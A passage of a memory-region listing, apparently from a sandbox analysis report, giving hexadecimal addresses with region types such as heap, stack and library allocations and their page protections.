page read and write
|
||
20084F30000
|
heap
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
20860860000
|
heap
|
page read and write
|
||
1DC84F40000
|
trusted library allocation
|
page read and write
|
||
1DCC0CD0000
|
heap
|
page read and write
|
||
7FFD9BD46000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B994000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB38000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
16681D40000
|
heap
|
page read and write
|
||
2084879D000
|
trusted library allocation
|
page read and write
|
||
200853D1000
|
trusted library allocation
|
page read and write
|
||
21FF27E000
|
stack
|
page read and write
|
||
7FFD9BBD4000
|
trusted library allocation
|
page read and write
|
||
1DC9D290000
|
heap
|
page read and write
|
||
16681D00000
|
direct allocation
|
page read and write
|
||
1DCB8710000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCE8000
|
trusted library allocation
|
page read and write
|
||
1DCA6820000
|
heap
|
page read and write
|
||
1F190075000
|
trusted library allocation
|
page read and write
|
||
1F1E7FF5000
|
heap
|
page read and write
|
||
1DCA69B3000
|
heap
|
page read and write
|
||
7FFD9BD1A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD64000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD46000
|
trusted library allocation
|
page read and write
|
||
1DC83105000
|
heap
|
page read and write
|
||
1DCA87F2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB3A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B993000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
B7D000
|
unkown
|
page readonly
|
||
1F18161C000
|
trusted library allocation
|
page read and write
|
||
20085577000
|
trusted library allocation
|
page read and write
|
||
20848D01000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD63000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
1DCA6908000
|
heap
|
page read and write
|
||
C25E03E000
|
stack
|
page read and write
|
||
7FFD9BD60000
|
trusted library allocation
|
page read and write
|
||
C000054000
|
direct allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
2009D571000
|
heap
|
page read and write
|
||
1F43A2B8000
|
heap
|
page read and write
|
||
A1E798D000
|
stack
|
page read and write
|
||
7FFD9BAEA000
|
trusted library allocation
|
page read and write
|
||
200854B1000
|
trusted library allocation
|
page read and write
|
||
53824FF000
|
stack
|
page read and write
|
||
7FFD9BD60000
|
trusted library allocation
|
page read and write
|
||
1F420060000
|
heap
|
page read and write
|
||
C25D873000
|
stack
|
page read and write
|
||
7FFD9B836000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9B80C000
|
trusted library allocation
|
page execute and read and write
|
||
16681CE0000
|
direct allocation
|
page read and write
|
||
1DC830C0000
|
heap
|
page read and write
|
||
21FF93C000
|
stack
|
page read and write
|
||
1F42206C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA4C000
|
trusted library allocation
|
page execute and read and write
|
||
1DC83174000
|
heap
|
page read and write
|
||
7FFD9BD48000
|
trusted library allocation
|
page read and write
|
||
1F181628000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9F0000
|
trusted library allocation
|
page read and write
|
||
1DC94F81000
|
trusted library allocation
|
page read and write
|
||
1F4224D6000
|
trusted library allocation
|
page read and write
|
||
1F1E9F35000
|
heap
|
page read and write
|
||
1DCA8721000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
A1E790E000
|
stack
|
page read and write
|
||
1DC82F80000
|
heap
|
page read and write
|
||
1F180232000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
1DC9D650000
|
heap
|
page read and write
|
||
208469E5000
|
heap
|
page read and write
|
||
7FFD9BD68000
|
trusted library allocation
|
page read and write
|
||
200953B1000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
1F43A0B5000
|
heap
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page execute and read and write
|
||
63C4A7E000
|
stack
|
page read and write
|
||
1DCC0930000
|
heap
|
page read and write
|
||
200835F2000
|
heap
|
page read and write
|
||
4F9B9FE000
|
stack
|
page read and write
|
||
208482B5000
|
heap
|
page read and write
|
||
20085583000
|
trusted library allocation
|
page read and write
|
||
2009D4B8000
|
heap
|
page read and write
|
||
2009D4DC000
|
heap
|
page read and write
|
||
1DCC0A62000
|
heap
|
page read and write
|
||
1F1EA1A9000
|
heap
|
page read and write
|
||
63C4EF9000
|
stack
|
page read and write
|
||
200835D0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B980000
|
trusted library allocation
|
page read and write
|
||
200835E0000
|
heap
|
page read and write
|
||
5382937000
|
stack
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB45000
|
trusted library allocation
|
page read and write
|
||
A1E6DBE000
|
stack
|
page read and write
|
||
1DC9D0DE000
|
heap
|
page read and write
|
||
C25EA8E000
|
stack
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
1F43A2AB000
|
heap
|
page read and write
|
||
20084F95000
|
heap
|
page read and write
|
||
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD78000
|
trusted library allocation
|
page read and write
|
||
C000048000
|
direct allocation
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
6F7447B000
|
stack
|
page read and write
|
||
A1E6AF9000
|
stack
|
page read and write
|
||
7FFD9BB40000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD8F000
|
trusted library allocation
|
page read and write
|
||
C000022000
|
direct allocation
|
page read and write
|
||
1F190001000
|
trusted library allocation
|
page read and write
|
||
1DCA68C7000
|
heap
|
page read and write
|
||
BFF000
|
unkown
|
page write copy
|
||
1DC9D1B0000
|
heap
|
page read and write
|
||
2009D802000
|
heap
|
page read and write
|
||
1F1E7F77000
|
heap
|
page read and write
|
||
7FFD9B984000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB62000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
A1E69FD000
|
stack
|
page read and write
|
||
C000132000
|
direct allocation
|
page read and write
|
||
7FFD9BD15000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD73000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDA0000
|
trusted library allocation
|
page read and write
|
||
1F1E8200000
|
heap
|
page read and write
|
||
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB10000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
20085575000
|
trusted library allocation
|
page read and write
|
||
1DCC0ACA000
|
heap
|
page read and write
|
||
4F9BBFE000
|
stack
|
page read and write
|
||
1F4200C7000
|
heap
|
page read and write
|
||
1DCA8BE3000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB08000
|
trusted library allocation
|
page read and write
|
||
208467F0000
|
heap
|
page read and write
|
||
7FFD9B9EC000
|
trusted library allocation
|
page execute and read and write
|
||
208487C4000
|
trusted library allocation
|
page read and write
|
||
208587B9000
|
trusted library allocation
|
page read and write
|
||
1DCA69C0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD03000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
1DC84A80000
|
heap
|
page read and write
|
||
7FFD9BD40000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA6E000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
2084875C000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD0E000
|
trusted library allocation
|
page read and write
|
||
1F4201C0000
|
heap
|
page read and write
|
||
1DCA9444000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
2009540E000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
1F1E9FCB000
|
heap
|
page read and write
|
||
20848CB7000
|
trusted library allocation
|
page read and write
|
||
7FFD9B901000
|
trusted library allocation
|
page read and write
|
||
1F1EA020000
|
heap
|
page execute and read and write
|
||
C0000E4000
|
direct allocation
|
page read and write
|
||
1DC83130000
|
heap
|
page read and write
|
||
A1E65CE000
|
stack
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
C000122000
|
direct allocation
|
page read and write
|
||
1DC94F10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCFB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
A1E64C3000
|
stack
|
page read and write
|
||
20085424000
|
trusted library allocation
|
page read and write
|
||
1F4320A2000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9AB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD1F000
|
trusted library allocation
|
page read and write
|
||
C000120000
|
direct allocation
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDC0000
|
trusted library allocation
|
page read and write
|
||
1DC8318C000
|
heap
|
page read and write
|
||
A1E6A7E000
|
stack
|
page read and write
|
||
7FFD9BD66000
|
trusted library allocation
|
page read and write
|
||
1F1E7FB0000
|
heap
|
page read and write
|
||
7FFD9BCB0000
|
trusted library allocation
|
page read and write
|
||
1F4200EA000
|
heap
|
page read and write
|
||
7FFD9B940000
|
trusted library allocation
|
page execute and read and write
|
||
20085499000
|
trusted library allocation
|
page read and write
|
||
6F7417A000
|
stack
|
page read and write
|
||
2084917C000
|
trusted library allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BD70000
|
trusted library allocation
|
page read and write
|
||
20083550000
|
heap
|
page read and write
|
||
1F420080000
|
heap
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
21FF8BE000
|
stack
|
page read and write
|
||
2008557D000
|
trusted library allocation
|
page read and write
|
||
A60000
|
unkown
|
page readonly
|
||
2009D583000
|
heap
|
page read and write
|
||
20848763000
|
trusted library allocation
|
page read and write
|
||
1F420125000
|
heap
|
page read and write
|
||
1F43A150000
|
heap
|
page execute and read and write
|
||
21FF73F000
|
stack
|
page read and write
|
||
53828BE000
|
stack
|
page read and write
|
||
4F9BFFF000
|
stack
|
page read and write
|
||
7FFD9BD4A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA76000
|
trusted library allocation
|
page execute and read and write
|
||
20848730000
|
heap
|
page execute and read and write
|
||
20085EAA000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA36000
|
trusted library allocation
|
page read and write
|
||
1DCC085B000
|
heap
|
page read and write
|
||
7FFD9BCE4000
|
trusted library allocation
|
page read and write
|
||
63C50FE000
|
stack
|
page read and write
|
||
7FFD9BBB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA3C000
|
trusted library allocation
|
page execute and read and write
|
||
C000112000
|
direct allocation
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
16681C60000
|
heap
|
page read and write
|
||
7FFD9BBE0000
|
trusted library allocation
|
page read and write
|
||
20083668000
|
heap
|
page read and write
|
||
C00013A000
|
direct allocation
|
page read and write
|
||
1F1E9970000
|
heap
|
page read and write
|
||
200858C9000
|
trusted library allocation
|
page read and write
|
||
1DCB8701000
|
trusted library allocation
|
page read and write
|
||
C00000C000
|
direct allocation
|
page read and write
|
||
7FFD9BCD0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page read and write
|
||
20085885000
|
trusted library allocation
|
page read and write
|
||
C0000A2000
|
direct allocation
|
page read and write
|
||
1F422ABC000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page read and write
|
||
1DC9D149000
|
heap
|
page read and write
|
||
1DC85CFA000
|
trusted library allocation
|
page read and write
|
||
20848240000
|
trusted library allocation
|
page read and write
|
||
1F43A180000
|
heap
|
page read and write
|
||
20085832000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD60000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA40000
|
trusted library allocation
|
page read and write
|
||
1F43A260000
|
heap
|
page read and write
|
||
7FFD9BCC0000
|
trusted library allocation
|
page read and write
|
||
20860850000
|
heap
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
6F739B3000
|
stack
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BD1A000
|
trusted library allocation
|
page read and write
|
||
200835C0000
|
heap
|
page readonly
|
||
1F1E7FCE000
|
heap
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page read and write
|
||
4F9BDFE000
|
stack
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC00000
|
trusted library allocation
|
page read and write
|
||
1F422B26000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCE4000
|
trusted library allocation
|
page read and write
|
||
1F422120000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC20000
|
trusted library allocation
|
page read and write
|
||
A61000
|
unkown
|
page execute read
|
||
2009D5B0000
|
heap
|
page execute and read and write
|
||
7FFD9BB31000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB92000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA00000
|
trusted library allocation
|
page read and write
|
||
C0000C2000
|
direct allocation
|
page read and write
|
||
1DCA8843000
|
trusted library allocation
|
page read and write
|
||
C000114000
|
direct allocation
|
page read and write
|
||
21FF37E000
|
stack
|
page read and write
|
||
1F422AC5000
|
trusted library allocation
|
page read and write
|
||
20083400000
|
heap
|
page read and write
|
||
7FFD9B760000
|
trusted library allocation
|
page read and write
|
||
C00011E000
|
direct allocation
|
page read and write
|
||
200853A1000
|
trusted library allocation
|
page read and write
|
||
7FFD9B870000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD90000
|
trusted library allocation
|
page read and write
|
||
2009D4D1000
|
heap
|
page read and write
|
||
7FFD9BD1F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD5F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB62000
|
trusted library allocation
|
page read and write
|
||
1F1E9FFF000
|
heap
|
page read and write
|
||
20085428000
|
trusted library allocation
|
page read and write
|
||
208587B7000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDB0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9CB000
|
trusted library allocation
|
page read and write
|
||
1F4320B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBF0000
|
trusted library allocation
|
page read and write
|
||
6F739FE000
|
stack
|
page read and write
|
||
63C51FB000
|
stack
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD48000
|
trusted library allocation
|
page read and write
|
||
A1E6F3B000
|
stack
|
page read and write
|
||
C25D97E000
|
stack
|
page read and write
|
||
7FFD9BA66000
|
trusted library allocation
|
page execute and read and write
|
||
C000037000
|
direct allocation
|
page read and write
|
||
16681D25000
|
heap
|
page read and write
|
||
1F1E9FD4000
|
heap
|
page read and write
|
||
7FFD9BD85000
|
trusted library allocation
|
page read and write
|
||
7FFD9B76B000
|
trusted library allocation
|
page read and write
|
||
200854EC000
|
trusted library allocation
|
page read and write
|
||
20848220000
|
trusted library allocation
|
page read and write
|
||
1F1E7FB2000
|
heap
|
page read and write
|
||
4F9B3FD000
|
stack
|
page read and write
|
||
C06000
|
unkown
|
page write copy
|
||
7FFD9BCEA000
|
trusted library allocation
|
page read and write
|
||
1F1E7FFB000
|
heap
|
page read and write
|
||
1DCA68DE000
|
heap
|
page read and write
|
||
7FFD9BD36000
|
trusted library allocation
|
page read and write
|
||
1F1E9FFA000
|
heap
|
page read and write
|
||
20846940000
|
heap
|
page read and write
|
||
1DCA8701000
|
trusted library allocation
|
page read and write
|
||
7FFD9B99D000
|
trusted library allocation
|
page execute and read and write
|
||
C0000B2000
|
direct allocation
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
C0000DA000
|
direct allocation
|
page read and write
|
||
5382C3E000
|
stack
|
page read and write
|
||
7FFD9BC22000
|
trusted library allocation
|
page read and write
|
||
7FFD9B910000
|
trusted library allocation
|
page execute and read and write
|
||
20848858000
|
trusted library allocation
|
page read and write
|
||
7FFD9B99B000
|
trusted library allocation
|
page read and write
|
||
C000146000
|
direct allocation
|
page read and write
|
||
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB80000
|
trusted library allocation
|
page execute and read and write
|
||
208487CE000
|
trusted library allocation
|
page read and write
|
||
20085573000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBD0000
|
trusted library allocation
|
page read and write
|
||
20085390000
|
heap
|
page execute and read and write
|
||
C00014C000
|
direct allocation
|
page read and write
|
||
B2A000
|
unkown
|
page readonly
|
||
1F181B75000
|
trusted library allocation
|
page read and write
|
||
20848280000
|
trusted library allocation
|
page read and write
|
||
2009D4B0000
|
heap
|
page read and write
|
||
7FFD9BD15000
|
trusted library allocation
|
page read and write
|
||
1DC94F8F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD34000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
1DC8598E000
|
trusted library allocation
|
page read and write
|
||
16681B60000
|
heap
|
page read and write
|
||
1DC85005000
|
trusted library allocation
|
page read and write
|
||
1DCC085D000
|
heap
|
page read and write
|
||
1DCA9500000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB50000
|
trusted library allocation
|
page execute and read and write
|
||
20848CEC000
|
trusted library allocation
|
page read and write
|
||
7FFD9BAE3000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCF0000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB20000
|
trusted library allocation
|
page read and write
|
||
C000128000
|
direct allocation
|
page read and write
|
||
20860DE0000
|
heap
|
page read and write
|
||
C000126000
|
direct allocation
|
page read and write
|
||
1DCA69E0000
|
trusted library allocation
|
page read and write
|
||
1DCA9321000
|
trusted library allocation
|
page read and write
|
||
7FFD9B99B000
|
trusted library allocation
|
page read and write
|
||
200836CB000
|
heap
|
page read and write
|
||
1F4200A0000
|
heap
|
page read and write
|
||
C25E0BB000
|
stack
|
page read and write
|
||
1DC9D030000
|
heap
|
page execute and read and write
|
||
1DCC08CD000
|
heap
|
page read and write
|
||
7FFD9BD70000
|
trusted library allocation
|
page read and write
|
||
1DCA87F5000
|
trusted library allocation
|
page read and write
|
||
16681C80000
|
direct allocation
|
page read and write
|
||
7FFD9BB41000
|
trusted library allocation
|
page read and write
|
||
1F190010000
|
trusted library allocation
|
page read and write
|
||
1DCC0A25000
|
heap
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
1DCB878A000
|
trusted library allocation
|
page read and write
|
||
1F1EA420000
|
heap
|
page read and write
|
||
7FFD9BA50000
|
trusted library allocation
|
page execute and read and write
|
||
C000156000
|
direct allocation
|
page read and write
|
||
208468D0000
|
heap
|
page read and write
|
||
1F1EA1DA000
|
heap
|
page read and write
|
||
1DCA8C27000
|
trusted library allocation
|
page read and write
|
||
C000004000
|
direct allocation
|
page read and write
|
||
1DCC089E000
|
heap
|
page read and write
|
||
2009D50B000
|
heap
|
page read and write
|
||
C0000AE000
|
direct allocation
|
page read and write
|
||
53829B9000
|
stack
|
page read and write
|
||
C79000
|
unkown
|
page readonly
|
||
7FFD9BB32000
|
trusted library allocation
|
page read and write
|
||
208491D3000
|
trusted library allocation
|
page read and write
|
||
1F4223AB000
|
trusted library allocation
|
page read and write
|
||
21FF47E000
|
stack
|
page read and write
|
||
7FFD9BB42000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD14000
|
trusted library allocation
|
page read and write
|
||
2084884F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD33000
|
trusted library allocation
|
page read and write
|
||
C000062000
|
direct allocation
|
page read and write
|
||
1F43A076000
|
heap
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
20848276000
|
heap
|
page execute and read and write
|
||
1DC83178000
|
heap
|
page read and write
|
||
C03000
|
unkown
|
page write copy
|
||
7FFD9BD44000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC80000
|
trusted library allocation
|
page read and write
|
||
1DCA880D000
|
trusted library allocation
|
page read and write
|
||
20848AED000
|
trusted library allocation
|
page read and write
|
||
1F4200E4000
|
heap
|
page read and write
|
||
200834E0000
|
heap
|
page read and write
|
||
20085E28000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD13000
|
trusted library allocation
|
page read and write
|
||
1F1E8235000
|
heap
|
page read and write
|
||
1DC83060000
|
heap
|
page read and write
|
||
1DCA6A70000
|
heap
|
page read and write
|
||
1F42216F000
|
trusted library allocation
|
page read and write
|
||
1F422AB8000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDB0000
|
trusted library allocation
|
page read and write
|
||
2009D506000
|
heap
|
page read and write
|
||
7FFD9BAC6000
|
trusted library allocation
|
page read and write
|
||
1F4201F0000
|
heap
|
page read and write
|
||
7FFD9BDD0000
|
trusted library allocation
|
page read and write
|
||
1F42207F000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
1F421B40000
|
heap
|
page read and write
|
||
1F422B2C000
|
trusted library allocation
|
page read and write
|
||
20848250000
|
heap
|
page readonly
|
||
C0000EC000
|
direct allocation
|
page read and write
|
||
2084697F000
|
heap
|
page read and write
|
||
C00008C000
|
direct allocation
|
page read and write
|
||
7FFD9BC50000
|
trusted library allocation
|
page read and write
|
||
1F1E9F89000
|
heap
|
page read and write
|
||
7FFD9BD1A000
|
trusted library allocation
|
page read and write
|
||
C25D8FF000
|
stack
|
page read and write
|
||
A1E6D3E000
|
stack
|
page read and write
|
||
7FFD9BB72000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
1DCA8220000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD2A000
|
trusted library allocation
|
page read and write
|
||
2009D6A0000
|
heap
|
page execute and read and write
|
||
1DCA6A75000
|
heap
|
page read and write
|
||
7FFD9BD78000
|
trusted library allocation
|
page read and write
|
||
1F43A089000
|
heap
|
page read and write
|
||
C00011C000
|
direct allocation
|
page read and write
|
||
1DC83142000
|
heap
|
page read and write
|
||
7FFD9B992000
|
trusted library allocation
|
page read and write
|
||
20085E3A000
|
trusted library allocation
|
page read and write
|
||
20860B1C000
|
heap
|
page read and write
|
||
1F1E9DB0000
|
heap
|
page execute and read and write
|
||
C0000D2000
|
direct allocation
|
page read and write
|
||
1DCA880A000
|
trusted library allocation
|
page read and write
|
||
1DCA8725000
|
trusted library allocation
|
page read and write
|
||
C16000
|
unkown
|
page read and write
|
||
1DCA69A8000
|
heap
|
page read and write
|
||
7FFD9BD96000
|
trusted library allocation
|
page read and write
|
||
7FFD9B770000
|
trusted library allocation
|
page read and write
|
||
C000035000
|
direct allocation
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB06000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD10000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
1DCC0A6C000
|
heap
|
page read and write
|
||
1DC8317A000
|
heap
|
page read and write
|
||
1F422010000
|
heap
|
page read and write
|
||
1F4200B2000
|
heap
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC70000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD09000
|
trusted library allocation
|
page read and write
|
||
7FFD9BCA0000
|
trusted library allocation
|
page read and write
|
||
2008367F000
|
heap
|
page read and write
|
||
7FFD9BC30000
|
trusted library allocation
|
page read and write
|
||
538368E000
|
stack
|
page read and write
|
||
7FFD9BD1A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB4A000
|
trusted library allocation
|
page read and write
|
||
20860B0B000
|
heap
|
page read and write
|
||
7FFD9BB9E000
|
trusted library allocation
|
page read and write
|
||
1F422548000
|
trusted library allocation
|
page read and write
|
||
20085EA4000
|
trusted library allocation
|
page read and write
|
||
538267D000
|
stack
|
page read and write
|
||
7FFD9B90A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD66000
|
trusted library allocation
|
page read and write
|
||
200854AB000
|
trusted library allocation
|
page read and write
|
||
53826FE000
|
stack
|
page read and write
|
||
1DCA8749000
|
trusted library allocation
|
page read and write
|
||
7FFD9BC40000
|
trusted library allocation
|
page read and write
|
||
C0000CC000
|
direct allocation
|
page read and write
|
||
7FFD9BD13000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD4A000
|
trusted library allocation
|
page read and write
|
||
1DCA83B0000
|
heap
|
page read and write
|
||
7FFD9BCF6000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD6F000
|
trusted library allocation
|
page read and write
|
||
1F1E9FBB000
|
heap
|
page read and write
|
||
7FFD9BC90000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA90000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB61000
|
trusted library allocation
|
page read and write
|
||
C25DBFD000
|
stack
|
page read and write
|
||
20083624000
|
heap
|
page read and write
|
||
7FFD9BCD8000
|
trusted library allocation
|
page read and write
|
||
6F73FFE000
|
stack
|
page read and write
|
||
7FFD9BC60000
|
trusted library allocation
|
page read and write
|
||
1DCC0A85000
|
heap
|
page read and write
|
||
7FFD9B9A0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B752000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB30000
|
trusted library allocation
|
page read and write
|
||
20848B26000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA76000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BAA0000
|
trusted library allocation
|
page execute and read and write
|
||
1F4219D0000
|
trusted library allocation
|
page read and write
|
||
C25DCBF000
|
stack
|
page read and write
|
||
208468F0000
|
heap
|
page read and write
|
||
A1E654D000
|
stack
|
page read and write
|
||
6F741F8000
|
stack
|
page read and write
|
||
A1E6BB6000
|
stack
|
page read and write
|
||
21FF5B7000
|
stack
|
page read and write
|
||
C0000D6000
|
direct allocation
|
page read and write
|
||
16681D4C000
|
heap
|
page read and write
|
||
7FFD9B75D000
|
trusted library allocation
|
page execute and read and write
|
||
208587AA000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD5A000
|
trusted library allocation
|
page read and write
|
||
C000154000
|
direct allocation
|
page read and write
|
||
5382CBB000
|
stack
|
page read and write
|
||
1DC85013000
|
trusted library allocation
|
page read and write
|
||
7FFD9BD30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BDE0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9D0000
|
trusted library allocation
|
page read and write
|
||
1DC85061000
|
trusted library allocation
|
page read and write
|
||
20083520000
|
heap
|
page read and write
|
||
7FFD9BA6C000
|
trusted library allocation
|
page execute and read and write
|
||
1DCA8286000
|
heap
|
page execute and read and write
|
||
1DC85428000
|
trusted library allocation
|
page read and write
|
||
7FFD9B960000
|
trusted library allocation
|
page read and write
|
||
1DCA9192000
|
trusted library allocation
|
page read and write
|
||
C00003C000
|
direct allocation
|
page read and write
|
||
7FFD9BB70000
|
trusted library allocation
|
page execute and read and write
|
||
7FFD9BCFB000
|
trusted library allocation
|
page read and write
|
||
7FFD9BBA0000
|
trusted library allocation
|
page read and write
|
||
20848270000
|
heap
|
page execute and read and write
|
||
7FFD9BB6A000
|
trusted library allocation
|
page read and write
|
||
7FFD9BB60000
|
trusted library allocation
|
page execute and read and write
|
||
C000086000
|
direct allocation
|
page read and write
|
||
7FFD9BD30000
|
trusted library allocation
|
page read and write
|
||
7FFD9BA60000
|
trusted library allocation
|
page read and write
|
||
C0000BC000
|
direct allocation
|
page read and write
|
||
BFF000
|
unkown
|
page read and write
|
||
1F4219E0000
|
heap
|
page readonly
|
||
7FFD9BD00000
|
trusted library allocation
|
page read and write
|
||
1F4219B0000
|
trusted library allocation
|
page read and write
|
||
7FFD9B9E0000
|
trusted library allocation
|
page read and write
|
||
20860B18000
|
heap
|
page read and write
|
||
63C4E78000
|
stack
|
page read and write
|
||
C19000
|
unkown
|
